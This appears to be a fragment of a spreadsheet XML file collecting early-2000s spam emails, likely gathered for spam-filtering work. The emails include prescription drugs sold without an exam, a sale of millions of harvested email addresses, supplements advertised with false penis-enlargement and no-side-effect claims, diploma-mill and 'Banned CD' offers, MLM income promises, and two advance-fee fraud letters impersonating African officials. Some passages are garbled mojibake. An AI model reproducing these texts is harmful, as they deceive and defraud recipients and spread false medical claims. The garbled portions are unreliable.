                          Kansas, Louisiana, Maine, Missouri, Montana, Nevada, 
                          New Hampshire, New Mexico, North Carolina, North Dakota, 
                          Oregon, Pennsylvania, South Carolina, Tennesee, Texas, 
                          Utah, Virginia, Washington State, and Wisconsin Bar 
                          Associations. Approval pending for Alabama and Minnesota.Call 
                     Attorney Connections at (800) 
                    221-8424 
                    to reserve your package today! 
OR: 
                    Click here to print the reservation form and fax to (760) 
                    731-7785; or 
                    mail to: Attorney Connections, P.O. Box 1533, Bonsall, CA 
                    92003</t>
  </si>
  <si>
    <t xml:space="preserve">
Lowest Viagra Prices Online!
We are the largest U.S. Company specializing
in prescriptions for VIAGRA,
weight loss management and other FDA approved medications.Â 
It has never been easier to get Viagra.Â 
No Physical Exam Necessary!
Free online consultationFully confidentialNo embarassmentÂ No appointmentsSecure orderingÂ Discreet and overnight shippingÂ GUARANTEED
LOWEST PRICES.
BURN FAT AND LOSE WEIGHT FAST WITH
PHENTERMINE!
Click
here to visit our online pharmacy.
Â 
To be excluded from our mailing list, CLICK
HERE.Â  You will then be automatically deleted from future
mailings.Â 
7984gXiC3-748UrBy5l17
</t>
  </si>
  <si>
    <t xml:space="preserve">0229Zgzv2-568HGJT2626iKKT6-981euQC8554l36
Untitled
ì´ë©œë¦¬ìŠ¤íŠ¸ 500ë§Œê°œ 4ë§Œì›ì— íŒë‹ˆë‹¤.
í•œë©”ì¼ì€ í™•ì‹¤í•˜ê²Œ ì œê±°ë˜ì–´ ìžˆêµ¬ì—¬. ì¤‘ë³µì€ í•˜ë‚˜ë‘ ì—†êµ¬ì—¬.
ë°±ë§Œê°œì”© ë¬¶ì–´ì„œ íŒŒì¼ 5ê°œë¡œ êµ¬ì„±ë˜ì–´ìžˆìŠµë‹ˆë‹¤. íŒŒì¼ í•œê°œë‹¹ 20ë©”ê°€ì •ë„ ë©ë‹ˆë‹¤.
ê·¸ëŸ¬ë‹ˆê¹Œ ì´ 100ë©”ê°€ì •ë„ ë©ë‹ˆë‹¤. ìž…ê¸ˆí•˜ì‹œë©´ ë°”ë¡œ ìµìŠ¤í”Œë¡œì–´ë¡œ ë‹¤ìš´ë°›ê²Œ í•´ë“œë¦½ë‹ˆë‹¤.
ìš”ì¦˜ ì œë°ë¡œ ì •ë¦¬ë„ ì•ˆëœ ë“œëŸ¬ìš´ ë¦¬ìŠ¤íŠ¸ê°€ ë§Žì€ë°ì—¬. ê·¸ëŸ°ê±°ëŠ” ì´ë©œë¦¬ìŠ¤íŠ¸ê°€ ì—¬ëŸ¬ê°œ ë‹¤ë‹¥ë‹¤ë‹¥ ë¶™ì–´ìžˆê³  ìž¡ë‹¤í•œ ë‚´ìš©ì´ ë§‰ ì„žì—¬ìžˆì ¸. ì•„ë§ˆ ì•„ì‹œëŠ” ë¶„ì€ ì•„ì‹¤êº¼ì—ì—¬. ë°œì†¡ê¸°ë¡œ ë¦¬ìŠ¤íŠ¸ë¥¼ ì½ì„ë¼ê³  í•´ë„ ì½í˜€ì§€ì§€ë„ ì•Šì ¸. ì œêº¼ëŠ” í•œì¤„ì— ì •í™•ížˆ ì´ë©œí•œê°œì”© ìž˜ ì •ë¦¬ë˜ì–´ìžˆì–´ì—¬. ë¹ˆì¤„ì´ë‚˜ ì´ë©œì£¼ì†Œì˜†ì— ë¹ˆì¹¸ë„ ì—†ì–´ì—¬. ì œê°€ ì§ì ‘ ì¶”ì¶œí•œê±°ì—ì—¬. ì´ë©œë¦¬ìŠ¤íŠ¸ ì•ˆì— ë– ë„ëŠ” ë„ˆì €ë¶„í•˜ê²Œ ë¶™ì–´ìžˆëŠ” ìž¡ë‹¤í•œ ë‚´ìš©ë„ ë‹¹ì—°ížˆ ì—†ìŠµë‹ˆë‹¤. ìš©ëˆ ì¢€ ë²Œë¼êµ¬ íŒ”ë¼ê³  í•˜ë‹ˆê¹Œì—¬ ì‡¼í•‘ëª°í•˜ì‹œê±°ë‚˜ ê·¸ëŸ°ë¶„ë“¤ ë§Žì´ ì—°ë½ì£¼ì„¸ì—¬. 
ì£¼ë¬¸ë°©ë²•ì€ ì•„ëž˜ì£¼ì†Œë¡œ ë¬¸ì˜í•´ì£¼ì„¸ìš”
ì—°ë½ì²˜: techtoy@naver.com
ì°¸ê³ ì ìœ¼ë¡œ, ì´ë²ˆì— ì´ë©œíŒŒëŠ” ê±°ëŠ” 1ì°¨êµ¬ì—¬, 2ì°¨ 500ë§Œê°œ ë¦¬ìŠ¤íŠ¸ë„ ì¤€ë¹„ì¤‘ì´ë‹ˆê¹Œì—¬,
ì´ê²ƒë„ í•„ìš”í•œ ë¶„ì€ ë¯¸ë¦¬ ì˜ˆì•½í•´ì£¼ì„¸ì—¬.ì¤€ë¹„ë˜ëŠ” ë°ë¡œ ë°”ë¡œ ì—°ë½ë“œë¦´ê»˜ì—¬.
1ì°¨ë¦¬ìŠ¤íŠ¸ëŠ” ë°©ê¸ˆ ì¶”ì¶œëë‚œ ìƒìƒí•œê²ë‹ˆë‹¤.
ì €ëŠ” ì¶”ì¶œê¸°ë¡œ ì¸í„°ë„·ìƒì—ì„œ ì¶”ì¶œí•œ ê²ƒë§Œ íŒ”ì•„ì—¬. ê·¸ ì™¸ì— ê°œì¸ì •ë³´ëŠ” ë³´ìœ í•˜ê³  ìžˆì§€ ì•ŠìŠµë‹ˆë‹¤. 
ì˜¤í•´ì—†ìœ¼ì‹œê¸° ë°”ëžë‹ˆë‹¤. ^^ì •ë³´í†µì‹ ë¶€ ê¶Œê³  ì‚¬í•­ì— ì˜ê±° ì œëª©ì— [ê´‘ê³ ] ë¼ê³  í‘œê¸°í•œ ê´‘ê³  ë©”ì¼ìž…ë‹ˆë‹¤.
 ìˆ˜ì‹ ì„ ì›ì¹˜ì•Šìœ¼ë©´ ìˆ˜ì‹ ê±°ë¶€ë¥¼ ëˆŒëŸ¬ ì£¼ì„¸ìš”. ìš°ë¦¬ì˜ ìˆ˜ì‹ ê±°ë¶€ìš”ì²­ ì²˜ë¦¬ë°©ë²•: ìˆ˜ì‹ ê±°ë¶€ë¡œ ë“¤ì–´ì˜¨ ì´ë©œë“¤ì€ ì£¼ì†Œìˆ˜ì§‘ê¸°ì— ì˜í•´ì„œ ìžë™ìœ¼ë¡œ ë³´ë‚¸ì‚¬ëžŒ ì£¼ì†Œë§Œì´ ìˆ˜ì§‘ëœ í›„ ìˆ˜ì‹ ê±°ë¶€ë¦¬ìŠ¤íŠ¸ë¡œ ëª¨ì•„ì§‘ë‹ˆë‹¤. ë‹¤ìŒ ì´ë©œë°œì†¡ì‹œ í•„í„°ë§ì„ í†µí•˜ì—¬ ìˆ˜ì‹ ê±°ë¶€ìžë¥¼ ë°œì†¡ë¦¬ìŠ¤íŠ¸ì—ì„œ ì‚­ì œí•œ í›„ ë°œì†¡í•©ë‹ˆë‹¤.
 To remove yourself from this mailing list, email to remove123@orgio.net with the word "remove" in the subject line.
2593kbTE4-794gRaI4880SaFB6-835pSrN3736MShr0-132VpQp9247lIyo7-932GuwT0770stEkl72
</t>
  </si>
  <si>
    <t xml:space="preserve">
xXxXxXxXxXxXxXxXxXxXxXxXxXThank you for your interest!Judgment Courses offers an extensive training
course in "How to Collect MoneyJudgments"If you are like many people, you are not even sure what a
Money Judgment is and why processing Money Judgments
can earn you very substantial income .If you ever sue a company or a person and you win then you
will have a Money Judgment against them.You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etc.Very few people know how to find these assets or what to do
when they are found. The result is that millions of
Judgments are just sitting in files and being forgotten."In 79% of the cases the winner of a Judgment never sees a
dime."The non-payment of judicial debt has grown to epidemic
proportions. Right now in the United States there is
between 200 and 300 billion dollars of uncollectedMoney
Judgment debt . For every Judgment that is paid, 5more
Judgments take its place.We identified this massive market 8 years ago and have
actively pursued Judicial Judgments since. We invented this
business. We have perfected it into a well proven and solid
profession in which only a select few will be trained in the
techniques necessary to succeed.With our first hand experience we have built a course which
teaches you how to start your business in this new unknown
and exciting field of processing Money Judgments.By following the steps laid out in our course and with
reasonable effort you can become very successful in the
processing of Money Judgments.The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dollars.92% of all of our associates work out of their home; 43%
are women and 36% are part time .One of the benefits of working in this field is that you are
not under any kind of time frame. If you decide to take off
for a month on vacation then go. The Judgments you are
working on will be there when you return. The Judgments
are still in force, they do not disappear.The way we train you is non-confrontational. You use your
computer and telephone to do most of the processing. You
never confront the debtor. The debtor doesn't know who you
are. You are not a collection agency.Simply stated the steps to successful Money Processing
are as follows:Mail our recommended letter to companies and individuals
with Money Judgments. (We train you how to find out who
to write to)8% to 11% of the firms and people you write will call you
and ask for your help. They call you, you don't call them
unless you want to.You send them an agreement (supplied in the course) to
sign which splits every dollar you collect 50% to you and
50% to them. This applies no matter if the judgment is for
$2,000.00 or $2,000,000.00.You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$25.00.Once you find the debtor and their assets you file
garnishments and liens on the assets you have located.
(Standard fill in the blanks forms are included in the
course)When you receive the assets you keep 50% and send 50% to
the original Judgment holder.Once the Judgment is fully paid you mail a Satisfaction of
Judgment to the court. (Included in the course)Quote's from several of our students:Thomas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on"After only having this course for four months, Larry S. in
area code 314 stated to us: "I am now making $2,000.00 per
week and expect this to grow to twice this amountwithin the
next year. I am having a ball. I have over $250,000 in
judgments I am collecting on now"After having our course for 7 months Larry S. in 314 stated
"I am now making $12,000.00 per month and have approximately
$500,000.00 in judgments I am collecting on. Looks like I
will have to hire someone to help out"Marshal in area code 407 states to us "I feel bad, you only
charged me $259.00 for this course and it is a goldmine. I
have added 3 full time people to help me after only having
your course for 5 months"&gt;From the above information and actual results you can see
why we can state the following:With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you!If the above sounds interesting to you then its time for you
to talk to a real live human being, no cost or obligation
on your part.Please call us at 1-2`8`1-5`0`0-4`0`1`8.We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not.Thank you for your time and interest.
+++++
This ad is produced and sent out by: UAS
To be  e  r   a  s  e  d  from our mailing list please email us at smiley82@168city.com  with  " e r a s e " in the sub-line or write us at:AdminScript-Update, P O B 1 2 0 0, O r a n  g e s t a d, A r  u b a
++++++
{%RAND%},,,,,,,,,,TO48 6-03 C29 P&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;5849796176976731484864674617967617464684646947976726441619467684696468416837196716976687My heart and my soul are lifted to you.
I offer my life to you everything I've been through
Use it for your glory.
</t>
  </si>
  <si>
    <t xml:space="preserve">Mortgage Lenders &amp; Brokers Are Ready to
        compete for your business.Whether a new home loan is what you seek or to refinance
your current home loan at a lower interest rate, we can help!Mortgage rates haven't been this low in years take action now!Refinance your home with us and include all of those pesky
credit card bills or use the extra cash for that pool you've 
always wanted...Where others say NO, we say YES!!!
Even if you have been turned down elsewhere, we can help!Easy terms!  Our mortgage referral service combines the
highest quality loans with the most economical rates and
the easiest qualifications!Take just 2 minutes to complete the following form.
There is no obligation, all information is kept strictly
confidential, and you must be at least 18 years of age.  
Service is available within the United States only.
This service is fast and free.  Free information request form:
PLEASE VISIThttp://builtit4unow.com/pos
****************************************************************
Since you have received this message you have either responded
to one of our offers in the past or your address has been
registered with us.  If you wish to "OPT_OUT" please visit:
http://builtit4unow.com/pos
****************************************************************
</t>
  </si>
  <si>
    <t>Lose weight while building lean muscle mass
Â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DisappearanceVisit
Our Web Site and Learn The Facts: Click Here
------------------------------------------
Click Here to be Un-Subscribe!
------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">
Don't get ripped off! Gimmicks to look out for: 
   Vacuum Pumps: Expensive Rip-off 
Most men aren't going to wait a whole year to gain 1" !!!!
Or do it the right way, instead they think the more they pump the faster the results. WRONG!A vacuum pump will injure your penis before it will enlarge your penis. 
Lengthen your manhood the FAST, NATURAL way! Check out our new, state of the art 
system
 Weight Hanging: Dangerous Rip-off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Rip-off
Penis enlargement surgery is a VERY dreaded, painful, and dangerous operation
 that has a quite HIGH nonsuccess rate according to patient opinion. 
Here are just SOME results. 
Deformed looking penis(Lumps &amp; Pits), Impotence, Loss of sex drive, 
Painful Erections, if any at all!!   
SAVE your HARD EARNED DOLLARS! Spending more is NOT always the best solution. Obtain a healthy looking, longer penis without scary surgery, and any chance of impotence! Learn more about our amazing exercise techniques! 
Special Offer!
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton System Works 
Norton
            System Works
A
                            complete problem-solving suite for advanced users
                            and small businesses.Norton
                  System Works Features:Norton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professional-looking faxesOrder
            Today$300.00 +
            ValueYour
            Price- $29.99Â Click
here to unsubscribe from these
mailings.
</t>
  </si>
  <si>
    <t xml:space="preserve">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25% or more!
Certified Natural Laboratories is pleased to introduce the
latest addition to their widely acclaimed line of herbal
supplements: Maxamanâ„¢.
Specially formulated with herbs and extracts from around
the globe, Maxamanâ„¢ can help to enhance sexual sensitivity,
increase sexual stamina, and actually increase the size of your
penis by up to 25%. The special blend of herbs in Maxamanâ„¢
have been shown to boost blood flow to the penis, thus expanding
the sponge-like erectile tissue in the penis, leading to size gains
in both length and thickness.
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
What To
Expect:
1-2 weeks
 Most men notice more powerful and longer lasting erections almost
immediately. A noticeable increase in thickness is also
common.3-8 weeks
 By this point you should be able to notice an increase in
thickness in both erect and flaccid states, as well as an overall
increase in length.9 weeks +
 After nine weeks, your penis should be noticeably larger in both
length and girth.
Â 
Below is a comparison chart compiled from the most recent
data on penis size. See how you measure up...
How to measure your penis size
correctly: To determine length, measure the erect penis
from the base of the penis where the top of the shaft meets the
pubic area (the peno-pubic junction) to the tip of the head. For
uncircumcised men the foreskin should be retracted. To determine
width, measure at mid-shaft around the circumference while the
penis is erect.Whether you have a small, average or large penis, it is now
possible for you to increase the size of your penis by up to 25%
without resorting to dangerous surgery or cumbersome
weights.
The
all-natural proprietary blend of unique herbs found in Maxaman is
designed to restore blood flow, unleash stored testosterone, and
heighten sensation by activating the body's natural hormone
production and supplying vital nutrients necessary for peak sexual
performance. All of the ingredients in Maxaman are stringently
scrutinized, and are guaranteed to be of the highest pharmaceutical
grade.1. How does Maxaman
work?
 The all
natural proprietary blend of unique ingredients found in Maxaman is
designed to restore blood flow, unleash stored testosterone, and
heighten sensation by activating the body's natural hormone
production and supplying vital nutrients necessary for peak sexual
performance. The special blend of herbs in Maxaman have been shown
to boost blood flow to the penis, thus expanding the sponge-like
erectile tissue in the penis, leading to size gains in both length
and thickness.
2. Is Maxaman
safe?
 Because
Maxaman is an all natural nutritional supplement containing only
the finest botanicals, there are no harmful side effects when taken
as directed. Maxaman is not a pharmaceutical drug and contains none
of the synthetic chemicals found in prescription medications. It is
a safe alternative to dangerous surgery.
3. What
can Maxaman do for me?Common benefits
from using Maxaman include:
 Up to a 25% increase in penis length and thickness
 Increased stamina
 Improved sexual desire
 Stronger, more powerful erections
 Greater control over ejaculation
 Stronger climaxes and orgasms
4. Will
I experience any side effects?
 There
are no harmful side effects when taken as directed.
5. What ingredients are used in
Maxaman?
 Maxaman is all natural, and made from the finest quality
botanicals available. To read more about each of these key
ingredients, please read below for all the details.
6. How
should I use Maxaman?
The normal
dosage of Maxaman is two capsules with a meal and a glass of water.
The cumulative effects of Maxaman increase with each dosage, making
it even more effective with continued use. Do not exceed six
capsules daily.
7. Do I
need a prescription to use Maxaman?
No you do not.
Because Maxaman is an all natural nutritional supplement containing
only the finest botanicals, there is no need to obtain a
prescription.
8. How
does Maxaman differ from other penis lengthening
procedures?
Maxaman is not
a pharmaceutical drug and contains none of the synthetic chemicals
found in prescription medications. It is an all natural formula
designed to boost blood flow to the penis, thus expanding the
sponge-like erectile tissue in the penis, leading to size gains in
both length and thickness. Maxaman provides men with a safe and
natural alternative to potentially dangerous
surgery.
9. How
long will it take to get my order?
Shipped the same day payment is received in most
cases..
10. Is it really safe to order
online?
Absolutely!
All information about your order is encrypted, and cannot be viewed
by anyone else. Ordering online using this state-of-the-art
processing system is actually much safer than using your credit
card in a restaurant or at the mall.
11. Is
Maxaman shipped discreetly?
Yes it is!
Maxaman is sent in an unmarked box with no indication whatsoever as
to what is contained inside.
11. How
much is shipping and handling?
$6.95 for the 1st. bottle and free for any
order more than 1 bottle.
Â 
The special
blend of herbs in Maxamanâ„¢ have been shown to boost
blood flow to the penis, thus expanding the sponge-like erectile
tissue in the penis, leading to size gains in both length and
thickness.
 Â 
The proprietary blend of herbs
found in Maxamanâ„¢ consists of:Zinc (as zinc oxide) - This essential mineral is required for
protein synthesis and collagen formation. Sufficient intake and
absorption of zinc are needed to maintain a proper concentration of
Vitamin E.Yohimbe - Used traditionally to treat impotence and frigidity,
Yohimbe helps to increase blood flow and sensitivity of nerves,
especially in the pelvic region. It is commonly used as an
aphrodisiac to stimulate sexual organs and improve central nervous
system function.Maca - Maca is an adaptogen. It works to create harmony in the
body, regulating levels of hormones and enzymes to create a state
of homeostasis.Catuaba - Native to Brazil and parts of the Amazon, Catuaba is
a central nervous system stimulant commonly used throughout the
world for treating sexual impotence, exhaustion and fatigue.Muira Puama - A South American herb, Muira Puama has been
used to treat impotence for hundreds of years. It is highly sought
after for its strong stimulant qualities.Oyster Meat - Historically
known as an aphrodisiac, oyster meat contains flavonoids that have
been shown to stimulate the reproductive system.L-Arginine - L-Arginine
is an amino acid which helps to create nitric oxide in the human
body. Nitric oxide is the most essential substance influencing
sexual function in both men and women. Nitric oxide promotes
circulation, resulting in improved blood flow.
 Â Oatstraw - Used to
treat fatigue and exhaustion, Oatstraw improves brain and nervous
system function and has been used to treat impotence. It is
extremely useful for aiding your body in recovering from
exhaustion, as well as correcting sexual debility.Nettle Leaf - Acts as a
diuretic, expectorant and tonic. It is rich in iron and chlorophyll
to clean and nourish the blood.
Cayenne - Cayenne improves
circulation, increases the metabolic rate and acts as a catalyst
for other herbs.
Pumpkin Seed - Pumpkin seed is
commonly used to strengthen the prostate gland and promote male
hormone function. Myosin, an amino acid found in pumpkin seeds, is
known to be essential for muscular contractions.Sarsaparilla - Found along
the coast of Peru, Sarsaparilla aids in the production of
testosterone and progesterone.Orchic Substance - This is an
extract from bovine testes, and is proven to increase testosterone
levels without harmful steroids.Licorice Root - Licorice root fights inflammation, as well as
viral, bacterial and parasitic infection. Licorice cleanses the
colon, and enhances microcirculation in the gastrointestinal
lining.Tribulus - A natural testosterone enhancer, Tribulus can
improve desire and performance and increase sexual energy. Tribulus
is also an excellent circulatory and heart tonic and can help
dilate arteries. In India it is used as a tonic for the urinary
system.Ginseng Blend (Siberian, American &amp; Korean) - Commonly used by athletes for overall body strengthening,
Ginseng fortifies the adrenal gland, and promotes healthy
circulation. It increases the conversion rate of sugars into the
necessary substrates for the formation of fatty acids in the liver.
Ginseng stimulates the central nervous system, and is a quick
antidote for fatigue.
Astragalus - Regarded as a potent
tonic for increasing energy levels and stimulating the immune
system, Astragalus has also been employed effectively as a
diuretic.Boron
- Boron helps to prevent the loss of calcium, phosphorus and
magnesium through the urine.
 Â ORDER NOW!Afraid its not for you? Don't worry we offer a LIFETIME
Guarantee! If your not ecstatic with our product, just return the
unused portion for a FULL Refund!! No questions will be
asked!
Thank you for your time and I hope to hear from you
soon!1701xdps5-747FzMY4320pCqi6-565wtfS4386DsOo6-564l44
</t>
  </si>
  <si>
    <t>x==x*x==xx==x*x==xx==x*x==xx==x*x==xx==x*x==xx==x*x==xAbsolutely Awesome!!&lt;!--#rotate&gt;  Instantly  Â S e x u a l l y  Attract with nature's secret weapon..." P  h  e  r  o  m  o n  e  s""I n v i s i b l e   a n d   u n d e t e c t a b l e" ,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o m i t t e d from our mailing list please email us at joshua63@email.is  with "o m i  t" in the sub-line.*|
TO48 6-04 C20 P
{%RAND}
&gt;&gt;SSPLTM&lt;&lt;2077
-Human Pheromones Concentrate-(S e x u a l l y  attract women S e x u a l l y  attract men Attract Men Attract Women and Men Instantly Attract Women and Men Become very desirable--Fast
Gain the sexual advantage Powerful, very powerful Become very desirable)</t>
  </si>
  <si>
    <t xml:space="preserve">Dear fellow eBay user,I listed this CD on eBay a few months ago and here's 
what happened.  I got an email from Safeharbor saying 
that all my auctions had been cancelled and that the CD 
was permanently "banned" from being sold on eBay.  From 
then on, I called it the "Banned CD"!So why did eBay ban it?  Maybe they figured you shouldn't 
have access to this type of information, or maybe they 
didn't think we could cram all of these programs onto 
one CD Rom.  I'll let you decide.This CD will teach you things that eBay, Uncle Sam, and 
others just don't want you to know.  I am not responsible 
for how you use some of this information and it is 
provided for educational purposes only.  Here are just a 
few of the things you will learn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List of companies who will issue you a college 
    degree (including a Phd.) for a fee.  No study 
    required!***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don't have room to list!Ask yourself this question: where else will you find such
a HUGE collection of information and software on one CD? 
And who else would dare sell you a CD containing so much 
"contraband" info?  It was banned on eBay, has been 
prohibited in THIRTY THREE countries, and will soon be 
unavailable in the USA. If you wait more than a few days
to order this CD, I can't guarantee I will be able to 
sell it.  Get this CD *** NOW *** before it is banned forever!We accept Visa/Mastercard, Paypal, or cash/check/money order. 
To order the "Banned CD" right now for the super low price of 
only $19.99, Click on the link below to pay with a 
Visa or Mastercard. This will take you to our secure 
server for order processing: http://tv-discounters.com/bannedc10.htmIf you have trouble accessing the link above,
please try this url instead:http://www.tv-discounters.com/bannedc10.htmOr you may send cash, check or money order by filling out
the order form below.------------------------- CUT HERE -----------------------"Banned CD"
Price: $19.99 + $4.01 ShippingHOW TO ORDER BY MAIL: Print out this order form and
send cash, personal check, money order or cashier's
check to the address listed below:Quiksilver Enterprises
816 Elm St. #472
Manchester, NH 03101Your Shipping Information:Your Name_____________________________________________Your Address__________________________________________Your City_____________________________________________State / Zip___________________________________________Phone #: _____________________________________________
(For problems with your order only. No salesmen will call.)Email Address_________________________________________NOTE: Shipping is delayed by up to ten days on all mail-in 
orders.[ ] YES! Please rush order my "Banned CD"!!* Please check one of the following payment options:[ ] I am mailing my credit card number. (Note your 
card will be charged for $24.00)[ ] I am enclosing a check or money order for $24.00
If paying by credit card, please fill in the information 
below:
Credit Card Number:________________________________Expiration Date:___________________________Signature:_________________________Date:____________________
NOTE: This CD is for informational, educational, or 
entertainment purposes only.  Some of the activities
described on this CD may be illegal if carried out.
This CD contains links and addresses of companies
and individuals which produce various products, or
offer various services, which may be illegal in your
country, state, or city.  However, it is perfectly 
LEGAL to purchase and possess the Banned CD in the 
United States of America.  Contains approximately 
100 megs of information.Shipping outside USA add $10.00Send an email to "affiliate5@btamail.net.cn"
if you no longer wish to receive these mailings.{%rand%}3084CCld6-429PrXi6858xaVB5-06l27
</t>
  </si>
  <si>
    <t xml:space="preserve">
Refinancing
              Your Mortgage May Be Easier Then You Think!
Now that rates are down,Â 
              this may be a good time to start saving money!
Click here for all details
Free Service for USA Homeowners!
Whether
your credit rating is A++ or you are "credit challenged",
we have many loanÂ 
 programs through hundreds of aggressive lenders wanting to help you.Â Second Mortgages                We can help you get up to 125% of your
homes value (ratios vary by state).Â 
Refinancing
Reduce your monthly payments and get
some cash back.
Debt
Consolidation
Combine all your bills into one low
payment,
and save money every month.Â 
We will get you the
best deal possible!Â 
 Lower rates and easier terms!
CLICK 
HERE For All Details And A Free Loan Quotation 
Today!We strongly
oppose the use of SPAM email and do not want anyone who does not wish to receive
ourÂ mailings to receive them. We strongly oppose the use of SPAM email and do not want anyone who does not wish to receive our mailings to receive
      them. Click
      Here to me taken off of our list. 
******************************************************************
80686</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</si>
  <si>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CopyrightÂ Â© 2002, all rights reserved. [RYTE^3247(^(PO1:KJ)_8J7BJK9^":}H&amp;*TG]
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR HOMEOWNER,.main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HOMEOWNER,Interest rates are at their lowest point in 40 years! 
 Let us do the shopping for you... AND IT'S FREE!Our nationwide network of lenders have hundreds of different loan programs to fit your current situation:
RefinanceSecond MortgageDebt ConsolidationHome ImprovementPurchase 
Please CLICK HERE to fill out a quick form. Your request will be transmitted to our network of mortgage specialists.Â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</si>
  <si>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webCREDITThank You,Your email address was obtained from a purchased 
list, Reference # 1320-15000.Â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</si>
  <si>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Take Control Of Your Conference Calls
Crystal Clear  
      Conference CallsOnly 18 Cents Per Minute!
(Anytime/Anywhere)No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Field*Name*
Web 
            Address
Company 
            Name*            State*
Business 
            Phone*
Home 
            Phone
Email 
            Address*
Type of 
            BusinessTo be removed from our list, please  
      Click 
      here..
</t>
  </si>
  <si>
    <t>** 5 FREE eBooks JUST FOR SIGNING UP. Sent via email within
   48 hours of entering your name and email address.
** NO PRESSURE TO BUY!
** TEST DRIVE IT FOR AS LONG AS YOU WISH FOR FREE!
** ONLY GET INVOLVED IF YOU LIKE WHAT YOU SEE.We will put 800 in your Downline in 30 days!!Visit http://www.fastbizonline.com/bizopp/         TRY IT FOR FEEE!It's working for me!!  I'm earning a guaranteed minimum
monthly income of $3,000.00!! and you can too!Accept our no cost, no obligation opportunity to
watch your business grow before you spend a dime.Visit http://www.fastbizonline.com/bizopp/Why are we doing this? Because when you see the
explosive growth and momentum, and how this
program was designed to help any sincere marketer
succeed, you'll accept the downline we've built under
you and harvest your piece of this incredible event.Join the team of Internet Marketing Professionals that
are presenting this opportunity to hundreds of people
every day!Thereâ€™s absolutely NO risk in joining
You owe it to yourself to
See it work today!!Visit http://www.fastbizonline.com/bizopp/FIRE YOUR BOSS!PAY OFF YOUR BILLS!SPEND MORE TIME WITH YOUR FAMILY!BUY A NEW CAR!PAY OFF YOUR MORTGAGE!Are all of these things are possible?YOU BET THEY ARE!
Visit http://www.fastbizonline.com/bizopp/Visit http://www.fastbizonline.com/bizopp/Visit http://www.fastbizonline.com/bizopp/
*************************************************************
If you do not wish to receive any more emails from me, please 
send an email to "affiliate1@btamail.net.cn" requesting to be 
removed.
*************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR SIR/MADAMRE: BUSINESS ASSISTANCEI have decided to contact your assistance in relation to the following business proposal, having obtained your contact through the commercial attach of your country's embassy in South Africa. This recommendation is based on the information that you will not betray the trust and confidence to be reposed in you. I am Romila Kabila the second son of the assassinated former President Of Democratic Republic Of Congo (D.C) Late Laurent Desire Kabila who on Tuesday 16 January   during the four years rule of my father I was his confidential/private security and base on my position of relationship of father and son. I was able to be in change of the president's personal security vault and some of his savings.Now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kabila's national executive council and the country top military brass, and properties worth millions of US$ to relocate the late president kabila's assets and properties with millions of dollars  to over sea country where there is good political climate. We have concluded arrangement to move/transfer the sum US$42M to a finance and security company in London through a Diplomatic courier services. The family through a diplomatic contact during my father's regime, conclude an arrangement to lodge/deposit the above sums with the GLOBAL DIPLOMATIC AND SECURITY SERVICES in LONDON - U.K!
.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embezzlement/siphoning of the Government/public funds overseas country as the case had be during the Late President Mobutu Sese Seko. So one cannot make law and destroy the same law. Therefore if you can render your assistance, please indicate your interest to me through my email romkabila@presidency.com, you should then urgently arrange to travel to London and clear the (consignments) funds upon it arrival and subsequent payment of the US$42M into your bank account. As soon as we hear from you, we then send a representative to be with you in London to represent our interest. Based on your anticipated efforts and contri!
bution the family has resolved to give you 20% commission and the remaining 80% will be reclaimed by the family. It will be my pleasure to be able to co-operate with you on terms that you may wish for the successful completion of this project. Thanks and remain blessed.Best Regards,
ROMILA KABILA
</t>
  </si>
  <si>
    <t>Dear,sir
I am Chief Tony Anenih,the minister of Works and Housing under
the government of President Olusegun Obasanjo. 
I am 51 years of age, married with one wife and
five  children.  I have served my beloved country
Nigeria  as a minister of Works and Housing for some years
now.Sir,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e-mail address (tonyaneco@mail.com)Thanks for your anticipated cooperation.Best Regards.ENGR Tony Anenih</t>
  </si>
  <si>
    <t xml:space="preserve">If anyone has called you names because you're overweight,
or you are looking to make a positive change in your life,
then you can do something now!Click here to find out how
http://4xenical.com/loseweight.cfm_______________________________________________
We hope you enjoyed receiving this email, but if you no longer
wish to receive our emails click on the link below and you will
not hear from us again  - we guarantee it!http://4xenical.com/remove.cfm
mvuyrbjoefexbxbqnxqafujbgnn
</t>
  </si>
  <si>
    <t xml:space="preserve">A.yellow:link {text-decoration: none; color: #FFF200}
A.yellow:visited {text-decoration: none; color: #FFF200}
A.yellow:active {text-decoration: none; color: #EFEFC8}
A.yellow:hover {text-decoration: none; color: #FFFFFF}
. 
              U N I V E R S I T Y . D I P L O M A S .Do 
                you want for a prosperous future, increased money earning power, 
                and the respect of all?
We 
                  can assist with Diplomas from prestigious non-accredited universities 
                  based on your present knowledge and life experience.
No required tests, classes, books, or 
                interviews. 
Bachelors, 
                masters, MBA, and doctorate (PhD) diplomas available in the field 
                of your choice - that's right, you can become a Doctor, Lawyer or Accountant and receive 
                all the benefits and admiration that comes with it!
No 
                one is turned down!
Confidentiality 
                assured - Change your Life Today!
                  Either Click Here or 
                  you can call us 24 hours a day, 7 days a week! (including 
                  Sundays and holidays):
1 - 310 - 388 - 6087  Contact 
                us NOW to receive your diploma within days, and start improving 
                your life!Did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</si>
  <si>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Free Card Search
Sincerely,Your New Offers Staff
Remove</t>
  </si>
  <si>
    <t xml:space="preserve">In a recent survey conducted by Durex
condoms, 67%
of women said thatthey are unhappy with the size of their lovers. Proof that size doesmatter! A large penis has much more surface area and is capable ofstimulating more nerve endings, providing more pleasure for you and yourpartner. Our revolutionary pill developed by world famous pharmacist isguaranteed to increase your size by 1-3".Enter here for detailsTo come off just Open here
</t>
  </si>
  <si>
    <t xml:space="preserve">
===========================================================                  PROVEN WAY TO GET A JOB!===========================================================LOS ANGELES - April 22, 2002 - One simple form gets your resume
on 75 career sites like Monster, HotJobs, Job.com, Dice &amp; more.
In about 15 minutes your resume can be seen by 1.5 million
employers and recruiters daily.Try it now at http://start.resumerabbit.com============================================================           POST YOUR RESUME TO MULTIPLE CAREER SITES============================================================In today's job market it's important to get your resume in
front of as many hiring managers as possible.  A new service
at http://start.resumerabbit.com will instantly post your resume
to Monster.com, Job.com, Headhunter.net, Dice and other top
jobs sites, searched by millions of hiring managers daily.ResumeRabbit's one-stop form takes about 15 minutes and will
save you over 60 hours of research and data entry.Once posted, your resume will be seen by the 1.5 million
employers and recruiters that search all the career sites every
day. To post your resume on 75 career sites go to:
